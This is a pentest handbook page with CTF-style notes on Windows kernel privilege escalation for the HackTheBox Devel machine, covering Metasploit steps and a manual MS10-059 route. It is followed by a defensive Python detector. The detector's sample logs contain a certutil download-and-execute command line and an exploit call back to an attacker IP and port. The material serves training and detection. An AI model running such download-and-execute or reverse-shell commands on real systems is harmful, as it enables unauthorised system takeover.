handbook/tools/5.Machine/2.Windows/Notes/3.Kernel-Exploits.md
2024-08-31 01:07:22 +02:00

Overview

  • We need the "systeminfo" output because kernel exploits are specific to the Windows build.
  • If we own the kernel, we own the system - that is what we are trying to do.

Escalation with Metasploit (Example - Devel HTB)

  1. Background the meterpreter session

  2. Search for and use the exploit proposed by the privilege-escalation suggester

  3. Set the meterpreter session to use (and the other required options)

  4. Run it and get another meterpreter session!

  5. Be root

Manual Kernel Exploitation (Devel - HTB)

  1. Search for the specific kernel exploit in Google
  • ms10-015 doesn't work because we don't have GUI access
  • so keep working through them & researching each one
  • the rest of the example uses MS10-059 (the chimichurri exploit)
  2. Download the .exe to the attacking machine

  3. Set up a Python HTTP server on the attacking machine to host the file for the victim to download

  4. Go to the temp folder (we likely have write access there)

  5. Download the file with the certutil command (similar to wget on Linux)

  6. Run the exploit with the proper syntax (ms.exe <attacker_IP> <attacker_port>)

  7. On the attacking machine, open another shell listening on the chosen port

  8. Become root!
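The defender's view of steps 3 to 6 above, as an added example that is not part of the original notes: a small Python detector that flags the "certutil used as a downloader into a temp folder, then a binary executed from that folder" pattern in process-creation logs. The Sysmon-style records, the TEST-NET IP address and the ms.exe filename are constructed for this example.

```python
import re

# Constructed Sysmon-style process-creation records (field=value pairs joined
# by "|"). Sample data written for this example, not log lines from the page.
SAMPLE_EVENTS = [
    "Image=C:\\Windows\\System32\\certutil.exe"
    "|CommandLine=certutil -urlcache -split -f http://198.51.100.7:8000/ms.exe C:\\Windows\\Temp\\ms.exe",
    "Image=C:\\Windows\\System32\\certutil.exe"
    "|CommandLine=certutil -hashfile C:\\Users\\bob\\report.pdf SHA256",
    "Image=C:\\Windows\\System32\\cmd.exe|CommandLine=cmd /c systeminfo",
    "Image=C:\\Windows\\Temp\\ms.exe|CommandLine=ms.exe 198.51.100.7 4444",
]

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
# Directories that low-privileged accounts can usually write to (step 4).
WRITABLE_DIRS = ("c:\\windows\\temp\\", "c:\\temp\\", "\\appdata\\local\\temp\\")


def parse_event(line):
    """Split a 'k=v|k=v' record into a dict with lower-cased keys."""
    return {k.lower(): v for k, v in (f.split("=", 1) for f in line.split("|"))}


def classify(event):
    """Return the detection labels that apply to one process-creation event."""
    image = event.get("image", "").lower()
    cmd = event.get("commandline", "")
    labels = []
    # 1. certutil acting as a downloader: -urlcache plus a URL on the command line.
    if image.endswith("\\certutil.exe") and "-urlcache" in cmd.lower() and URL_RE.search(cmd):
        labels.append("certutil_download")
        # 2. ...with the fetched file landing in a user-writable temp directory.
        if any(d in cmd.lower() for d in WRITABLE_DIRS):
            labels.append("download_to_temp")
    # 3. A binary launched from a temp directory, as the exploit is in step 6.
    if any(d in image for d in WRITABLE_DIRS):
        labels.append("exec_from_temp")
    return labels


def scan(lines):
    """Return (index, labels) for every event that triggers at least one label."""
    hits = []
    for i, line in enumerate(lines):
        labels = classify(parse_event(line))
        if labels:
            hits.append((i, labels))
    return hits
```

Legitimate certutil use (hashing a file in the second record) and plain reconnaissance (systeminfo) produce no labels, so the alert fires only on the download-and-execute chain.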